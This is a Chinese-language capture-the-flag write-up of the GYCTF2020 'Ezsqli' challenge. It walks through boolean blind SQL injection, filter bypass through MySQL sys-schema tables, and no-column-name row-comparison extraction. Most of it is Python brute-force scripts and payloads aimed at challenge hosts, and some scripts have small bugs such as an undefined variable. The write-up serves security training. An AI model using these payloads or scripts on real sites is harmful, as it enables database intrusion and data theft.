[GYCTF2020]Ezsqli-布尔盲注+无列名注入
首页测试id=1,id=2,id=2',发现id=2'时页面显示bool(false),确认是布尔盲注,随后又通过fuzz sql测试了id=(select 1)现实id=1的页面
下面正式开始注入
1.检测数据库名长度
经过测试,n=21,后面发现通过代码盲注,这步用不到。id=(select length(database())>n)
2.爆破数据库名
数据库名为give_grandpa_pa_pa_pa
def cyctf():
url = "http://9d81359a-bbc2-411e-93a8-1c9ab5312d5d.node5.buuoj.cn:81/index.php"
database = ""
for j in range(0, 100):
for i in range(65, 122):
payload = "if(ascii(substr((select database()),%d,1))=%d,1,3)" % (j, i)
# print(payload)
body = {"id": payload}
try:
res = requests.post(url, data=body)
except requests.exceptions as e:
print(e)
# print(res.text)
if "SQL" in res.text:
print("被检测了")
break
if "Nu1L" in res.text:
table += chr(i)
break
print(database)3.爆破数据表名
输入id=if(ascii(substr(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='give_grandpa_pa_a_pa'),1,1))=1,1,3)
提示SQL Injection Checked. 被检测了,尝试select group_concat(table_name) from mysql.innodb_table_stats where database_name=database(),发现也被检测到了。之后尝试了
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database()
select table_name from sys.x$schema_table_statistics_with_buffer where table_schema=database()
发现还不行,最后看了大佬写的WP,用的是select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()
结果:f1ag_1s_h3r3_hhhhh,users2333333333333
def cyctf():
url = "http://e66e76b8-187c-4630-9276-a68e2dbff3e8.node5.buuoj.cn:81/"
table = ""
for j in range(1, 100):
j_flag = 0
for i in range(35, 126):
j_flag = 0
# print(i)
payload = "if(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),%d,1))=%d,1,3)" % (
j, i)
# print(payload)
body = {"id": payload}
try:
res = requests.post(url, data=body)
except requests.exceptions as e:
print(e)
# print(res.text)
if "SQL" in res.text:
print("被检测了")
break
if "Nu1L" in res.text:
table += chr(i)
j_flag = 1
break
if j_flag == 0:
print("出现问题")
print(j)
break
print(j)
print(table)4.直接爆数据
采用无列名查询的方法
由于join 和union都已经被禁了,所以只能采用ASCII的方法
首先检测字段数量,若前后字段不一致,则会false
id=1^((select 1,2)>(select * from f1ag_1s_h3r3_hhhhh))
发现有两个字符,之后就是爆破字段了
select (select 'b') > (select 'abcdefg')
#返回1
select (select 'b') > (select 'c')
#返回0
select (SELECT 'bb') > (select 'ba')
#返回1
select (SELECT 1,'bb') > (select 1,'ba')
#返回1
select (SELECT 1,'bb') > (select 2,'ba')
#返回0
select (SELECT '1') > (select 'a')
#返回0
select (SELECT 1) > (select 'a')
#返回1
select (SELECT 1) = (select '1')
#返回1
select (SELECT 1) > (select '~')
#返回1
select (SELECT 'flag') > (select 'f')
#返回1
#比较的时候,1=’1’,但’1’<’a’,且1>’a’,经测可知,数字>字符。最终flag为flag{d6eda5a4-5b3d-4f0b-bbdb-ce660b1cf444}
import requests
q = []
q.append('-')
# 将数字添加到列表中
for x in range(0, 10):
q.append(x)
# 将小写字母添加和逗号添加到列表
for x in range(ord("a"), ord("z") + 1):
q.append(chr(x))
q.append('{')
q.append('}')
def cyctf():
url = "http://ccd7817e-335e-4ce4-8b07-c8c736f7de4d.node5.buuoj.cn:81/"
flag = ""
for j in range(0, 100):
j_flag = 0
for i in range(len(q)):
j_flag = 0
payload = "1^(select (SELECT 1,'%s') > (select * from f1ag_1s_h3r3_hhhhh))^1" % (flag + str(q[i]))
# print(payload)
body = {"id": payload}
try:
res = requests.post(url, data=body)
except requests.exceptions as e:
print(e)
# print(res.text)
if "Nu1L" in res.text:
flag += str(q[i - 1])
j_flag = 1
break
if "bool(false)" in res.text:
print("出现错误")
break
if "SQL" in res.text:
print("被检测了")
break
if j_flag == 0:
print("出现问题")
print(j)
break
print(j)
print(flag)
空空如也!